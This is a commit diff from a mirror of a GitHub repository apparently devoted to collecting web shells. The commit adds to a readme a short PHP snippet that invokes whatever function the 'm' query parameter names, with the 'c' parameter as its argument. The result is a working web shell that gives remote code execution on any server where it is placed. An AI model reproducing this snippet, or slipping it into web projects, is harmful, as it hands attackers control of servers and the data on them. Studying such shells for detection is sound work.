mirror of
https://github.com/tennc/webshell.git
synced 2025-12-21 15:19:01 +00:00
update readme.md
This commit is contained in:
@@ -1,3 +1,14 @@
|
|||||||
|
|
||||||
|
|
||||||
<img src="11.jpg" alt="alt text" title="Title" />
|
<img src="11.jpg" alt="alt text" title="Title" />
|
||||||
|
|
||||||
|
|
||||||
|
***************************************************
|
||||||
|
code:
|
||||||
|
|
||||||
|
<?php
|
||||||
|
$func = new ReflectionFunction($_GET[m]);
|
||||||
|
echo $func->invokeArgs(array($_GET[c]));
|
||||||
|
?>
|
||||||
|
|
||||||
|
***************************************************
|
||||||
Reference in New Issue
Block a user